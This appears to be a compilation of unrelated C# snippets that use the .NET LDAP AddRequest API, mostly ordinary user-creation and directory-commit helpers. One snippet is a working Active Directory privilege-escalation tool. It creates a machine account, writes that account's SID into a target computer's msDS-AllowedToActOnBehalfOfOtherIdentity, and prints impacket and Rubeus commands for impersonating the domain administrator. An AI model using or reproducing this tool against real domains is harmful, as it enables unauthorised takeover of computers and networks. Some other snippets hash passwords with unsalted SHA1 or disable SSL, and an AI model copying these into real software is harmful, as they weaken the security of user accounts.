public static AddRequest GetAddRequest(ILdapUser user, string objectClass)
{
var addReq = new AddRequest {DistinguishedName = user.GetUserDn()};
addReq.Attributes.Add(new DirectoryAttribute("objectClass", objectClass));
addReq.Attributes.Add(new DirectoryAttribute("cn", user.GetUserCn()));
addReq.Attributes.Add(new DirectoryAttribute("sn", user.GetUserSn()));
foreach (string attributeName in user.GetUserAttributeKeys())
{
foreach (string attributeValue in user.GetUserAttribute(attributeName))
{
addReq.Attributes.Add(new DirectoryAttribute(attributeName, attributeValue));
}
}
return addReq;
}
public bool LadpAdd(string strOU, DirectoryAttribute[] dirAttrList1)
{
string strOU1 = strOU + "," + m_TargetOU;
AddRequest addRequest = new AddRequest(strOU1, dirAttrList1);
m_LdapConnection.SendRequest(addRequest);
return true;
}
/// <summary>
/// Adds a user to the LDAP server database. This method is intentionally less generic than the search one to
/// make it easier to add meaningful information to the database.
/// </summary>
/// <param name="user">The user to add</param>
public void addUser(UserModel user)
{
var sha1 = new SHA1Managed();
var digest = Convert.ToBase64String(sha1.ComputeHash(System.Text.Encoding.UTF8.GetBytes(user.UserPassword)));
var request = new AddRequest(user.DN, new DirectoryAttribute[] {
new DirectoryAttribute("uid", user.UID),
new DirectoryAttribute("ou", user.OU),
new DirectoryAttribute("userPassword", "{SHA}" + digest),
new DirectoryAttribute("objectClass", new string[] { "top", "account", "simpleSecurityObject" })
});
connection.SendRequest(request);
}
public string createUserLdap(User user)
{
ldapId = new LdapDirectoryIdentifier(HOST, PORT);
network = new NetworkCredential(ADMIN, ADMIN_PASS);
using (LdapConnection connection = new LdapConnection(ldapId, network, AuthType.Basic))
{
try
{
string[] objectClass = new string[] { "top", "inetOrgPerson", "organizationalPerson", "person" };
connection.SessionOptions.SecureSocketLayer = false;
connection.SessionOptions.ProtocolVersion = 3;
String dn = DN_CREATE.Replace("{0}", user.email);
DirectoryAttributeCollection collection = new DirectoryAttributeCollection() {
new DirectoryAttribute("objectclass", objectClass),
new DirectoryAttribute("uid",user.email),
new DirectoryAttribute("sn", user.lastName),
new DirectoryAttribute("cn", user.userName),
new DirectoryAttribute("employeeNumber", user.userId),
new DirectoryAttribute("departmentNumber", user.userGroup),
new DirectoryAttribute("userPassword", user.password)
};
AddRequest addMe = new AddRequest(dn, "inetOrgPerson");
addMe.Attributes.AddRange(collection);
connection.Bind();
connection.SendRequest(addMe);
return "OK";
}
catch (LdapException ex)
{
throw new BusinessException("Ldap error: " + ex.Message);
}
catch (Exception e)
{
throw new PlatformException("Ldap error: " + e.Message);
}
}
}
static void Main(string[] args)
{
if (args.Length < 2)
{
Usage();
return;
}
var arguments = new Dictionary <string, string>();
foreach (string argument in args)
{
int idx = argument.IndexOf('=');
if (idx > 0)
{
arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
}
}
if (!arguments.ContainsKey("domain") || !arguments.ContainsKey("dc") || !arguments.ContainsKey("tm"))
{
Usage();
return;
}
String DomainController = arguments["dc"];
String Domain = arguments["domain"];
String new_MachineAccount = "";
String new_MachineAccount_password = "";
//添加的机器账户
if (arguments.ContainsKey("ma"))
{
new_MachineAccount = arguments["ma"];
}
else
{
new_MachineAccount = RandomString(8);
}
//机器账户密码
if (arguments.ContainsKey("ma"))
{
new_MachineAccount_password = arguments["mp"];
}
else
{
new_MachineAccount_password = RandomString(10);
}
String victimcomputer = arguments["tm"];; //需要进行提权的机器
String machine_account = new_MachineAccount;
String sam_account = "";
String DistinguishedName = "";
if (machine_account.EndsWith("$"))
{
sam_account = machine_account;
machine_account = machine_account.Substring(0, machine_account.Length - 1);
}
else
{
sam_account = machine_account + "$";
}
String distinguished_name = DistinguishedName;
String victim_distinguished_name = DistinguishedName;
String[] DC_array = null;
distinguished_name = "CN=" + machine_account + ",CN=Computers";
victim_distinguished_name = "CN=" + victimcomputer + ",CN=Computers";
DC_array = Domain.Split('.');
foreach (String DC in DC_array)
{
distinguished_name += ",DC=" + DC;
victim_distinguished_name += ",DC=" + DC;
}
Console.WriteLine(victim_distinguished_name);
Console.WriteLine("[+] Elevate permissions on " + victimcomputer);
Console.WriteLine("[+] Domain = " + Domain);
Console.WriteLine("[+] Domain Controller = " + DomainController);
//Console.WriteLine("[+] Distinguished Name = " + distinguished_name);
try{
//连接ldap
System.DirectoryServices.Protocols.LdapDirectoryIdentifier identifier = new System.DirectoryServices.Protocols.LdapDirectoryIdentifier(DomainController, 389);
//NetworkCredential nc = new NetworkCredential(username, password); //使用凭据登录
System.DirectoryServices.Protocols.LdapConnection connection = null;
//connection = new System.DirectoryServices.Protocols.LdapConnection(identifier, nc);
connection = new System.DirectoryServices.Protocols.LdapConnection(identifier);
connection.SessionOptions.Sealing = true;
connection.SessionOptions.Signing = true;
connection.Bind();
//通过ldap找计算机
System.DirectoryServices.DirectoryEntry myldapConnection = new System.DirectoryServices.DirectoryEntry(Domain);
myldapConnection.Path = "LDAP://" + victim_distinguished_name;
myldapConnection.AuthenticationType = System.DirectoryServices.AuthenticationTypes.Secure;
System.DirectoryServices.DirectorySearcher search = new System.DirectoryServices.DirectorySearcher(myldapConnection);
search.Filter = "(CN=" + victimcomputer + ")";
string[] requiredProperties = new string[] { "samaccountname" };
foreach (String property in requiredProperties)
{
search.PropertiesToLoad.Add(property);
}
System.DirectoryServices.SearchResult result = null;
try
{
result = search.FindOne();
}
catch (System.Exception ex)
{
Console.WriteLine("[!] " + ex.Message + "\n[-] Exiting...");
return;
}
//添加机器并设置资源约束委派
if (result != null)
{
try
{
var request = new System.DirectoryServices.Protocols.AddRequest(distinguished_name, new System.DirectoryServices.Protocols.DirectoryAttribute[] {
new System.DirectoryServices.Protocols.DirectoryAttribute("DnsHostName", machine_account + "." + Domain),
new System.DirectoryServices.Protocols.DirectoryAttribute("SamAccountName", sam_account),
new System.DirectoryServices.Protocols.DirectoryAttribute("userAccountControl", "4096"),
new System.DirectoryServices.Protocols.DirectoryAttribute("unicodePwd", Encoding.Unicode.GetBytes("\"" + new_MachineAccount_password + "\"")),
new System.DirectoryServices.Protocols.DirectoryAttribute("objectClass", "Computer"),
new System.DirectoryServices.Protocols.DirectoryAttribute("ServicePrincipalName", "HOST/" + machine_account + "." + Domain, "RestrictedKrbHost/" + machine_account + "." + Domain, "HOST/" + machine_account, "RestrictedKrbHost/" + machine_account)
});
//添加机器账户
connection.SendRequest(request);
Console.WriteLine("[+] New SAMAccountName = " + sam_account);
Console.WriteLine("[+] Machine account: " + machine_account + " Password: "******" added");
}
catch (System.Exception ex)
{
Console.WriteLine("[-] The new machine could not be created! User may have reached ms-DS-new_MachineAccountQuota limit.)");
Console.WriteLine("[-] Exception: " + ex.Message);
return;
}
// 获取新计算机对象的SID
var new_request = new System.DirectoryServices.Protocols.SearchRequest(distinguished_name, "(&(samAccountType=805306369)(|(name=" + machine_account + ")))", System.DirectoryServices.Protocols.SearchScope.Subtree, null);
var new_response = (System.DirectoryServices.Protocols.SearchResponse)connection.SendRequest(new_request);
SecurityIdentifier sid = null;
foreach (System.DirectoryServices.Protocols.SearchResultEntry entry in new_response.Entries)
{
try
{
sid = new SecurityIdentifier(entry.Attributes["objectsid"][0] as byte[], 0);
Console.Out.WriteLine("[+] " + new_MachineAccount + " SID : " + sid.Value);
}
catch
{
Console.WriteLine("[!] It was not possible to retrieve the SID.\nExiting...");
return;
}
}
//设置资源约束委派
String sec_descriptor = @"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;" + sid.Value + ")";
RawSecurityDescriptor sd = new RawSecurityDescriptor(sec_descriptor);
byte[] buffer = new byte[sd.BinaryLength];
sd.GetBinaryForm(buffer, 0);
//测试sddl转换结果
//RawSecurityDescriptor test_back = new RawSecurityDescriptor (buffer, 0);
//Console.WriteLine(test_back.GetSddlForm(AccessControlSections.All));
// 添加evilpc的sid到msds-allowedtoactonbehalfofotheridentity中
try
{
var change_request = new System.DirectoryServices.Protocols.ModifyRequest();
change_request.DistinguishedName = victim_distinguished_name;
DirectoryAttributeModification modifymsDS = new DirectoryAttributeModification();
modifymsDS.Operation = DirectoryAttributeOperation.Replace;
modifymsDS.Name = "msDS-AllowedToActOnBehalfOfOtherIdentity";
modifymsDS.Add(buffer);
change_request.Modifications.Add(modifymsDS);
connection.SendRequest(change_request);
Console.WriteLine("[+] Exploit successfully!\n");
//打印利用方式
Console.WriteLine("[+] Use impacket to get priv!\n");
Console.WriteLine("\ngetST.py -dc-ip {0} {1}/{2}$:{3} -spn cifs/{4}.{5} -impersonate administrator", DomainController, Domain, machine_account, new_MachineAccount_password, victimcomputer, Domain);
Console.WriteLine("\nexport KRB5CCNAME=administrator.ccache");
Console.WriteLine("\npsexec.py {0}/administrator@{1}.{2} -k -no-pass", Domain, victimcomputer, Domain);
Console.WriteLine("\n\n[+] Use Rubeus.exe to get priv!\n");
Console.WriteLine("\nRubeus.exe hash /user:{0} /password:{1} /domain:{2}", machine_account, new_MachineAccount_password, Domain);
Console.WriteLine("\nRubeus.exe s4u /user:{0} /rc4:rc4_hmac /impersonateuser:administrator /msdsspn:cifs/{1}.{2} /ptt /dc:{3}", machine_account, victimcomputer, Domain, DomainController);
Console.WriteLine("\npsexec.exe \\\\{0}.{1} cmd ", victimcomputer, Domain);
Console.WriteLine("\n[+] Done..");
}
catch (System.Exception ex)
{
Console.WriteLine("[!] Error: " + ex.Message + " " + ex.InnerException);
Console.WriteLine("[!] Failed...");
return;
}
}
}
catch (System.Exception ex) {
Console.WriteLine("[!] " + ex.Message + "\n[-] Exiting...");
return;
}
}
/// <summary>
/// Send all pending changes to the directory service. If there is a pending rename / re-superior,
/// it will fire first.
/// </summary>
/// <param name="ldap"></param>
public void CommitChanges(LdapConnection ldap)
{
CheckForDeletion();
if (this.IsDnDirty)
{
ModifyDNRequest req = new ModifyDNRequest();
req.DistinguishedName = this.OriginalDn;
req.NewName = this.RDN;
logger.Info("Request new name {0}", req.NewName);
req.DeleteOldRdn = true;
if (this.IsSuperiorDirty)
{
req.NewParentDistinguishedName = this.SuperiorDn;
logger.Info("Request new superior {0}", req.NewParentDistinguishedName);
}
ldap.SendRequest(req);
this.IsDnDirty = false;
this.IsSuperiorDirty = false;
this.OriginalDn = this.DistinguishedName;
}
if (_changes.Count > 0)
{
if (this.IsNewEntry)
{
AddRequest req = new AddRequest(this.DistinguishedName);
foreach (DirectoryAttributeModification dm in this.ChangesAsDAMC())
req.Attributes.Add(new DirectoryAttribute(dm.Name, dm.GetValues(typeof(string))));
ldap.SendRequest(req);
}
else
{
ModifyRequest req = new ModifyRequest(this.DistinguishedName);
foreach (DirectoryAttributeModification dm in this.ChangesAsDAMC())
req.Modifications.Add(dm);
ldap.SendRequest(req);
}
_changes.Clear();
this.IsNewEntry = false;
logger.Info("Commit on {0} complete", this.DistinguishedName);
}
else
{
logger.Info("Nothing to commit on {0}", this.DistinguishedName);
if (this.IsNewEntry)
throw new InvalidOperationException(
"Cannot commit a new directory object with no attributes");
}
}
/// <summary>
/// Adds an entry to the LDAP directory with the specified distinguished name and attributes.
/// </summary>
/// <param name="dn">The distinguished name of the entry to add.</param>
/// <param name="attributes">The attributes for the entry to add.</param>
/// <returns>True if added, false otherwise.</returns>
public bool Add(string dn, DirectoryAttribute[] attributes)
{
if (!string.IsNullOrWhiteSpace(dn))
{
AddRequest request = new AddRequest(dn, attributes);
try
{
AddResponse response = (AddResponse)connection.SendRequest(request);
// Check that a response was received.
if (response != null)
{
// A response was received.
if (response.ResultCode == ResultCode.Success)
{
return true;
}
}
else
{
// A response was not received.
return false;
}
}
catch
{
}
}
return false;
}
/// <summary>
/// Crear un nuevo usuario en el ADAM
/// </summary>
/// <param name="loginName">Nombre de Login</param>
/// <param name="fullName">Nombre y Apellido del usuario</param>
/// <param name="password">Contraseña</param>
/// <returns></returns>
public ResultCode CreateUser(string loginName, string fullName, string password)
{
if (this.UserExist(loginName))
return ResultCode.EntryAlreadyExists;
this.OpenConnection();
string dirClasstype = "user";
string userDN = string.Format("CN={0},{1}", loginName, this._usersDistinguishedName);
AddRequest addNewUserRequest = new AddRequest(userDN, dirClasstype);
AddResponse response = (AddResponse)this._adamConnection.SendRequest(addNewUserRequest);
if (response.ResultCode != ResultCode.Success)
return response.ResultCode;
DirectoryAttributeModification attFullName = new DirectoryAttributeModification();
attFullName.Name = "givenName";
attFullName.Operation = DirectoryAttributeOperation.Add;
attFullName.Add(fullName);
DirectoryAttributeModification attPassword = new DirectoryAttributeModification();
attPassword.Name = "unicodePwd";
attPassword.Add(GetPasswordData(password));
attPassword.Operation = DirectoryAttributeOperation.Add;
DirectoryAttributeModification attDisableAccount = new DirectoryAttributeModification();
attDisableAccount.Name = "msDS-UserAccountDisabled";
attDisableAccount.Add("FALSE");
attDisableAccount.Operation = DirectoryAttributeOperation.Replace;
ModifyRequest modRequest = new ModifyRequest(userDN, attFullName, attPassword, attDisableAccount);
ModifyResponse modResponse = (ModifyResponse)this._adamConnection.SendRequest(modRequest);
if (modResponse.ResultCode != ResultCode.Success)
return modResponse.ResultCode;
this.CloseConnection();
return modResponse.ResultCode;
}
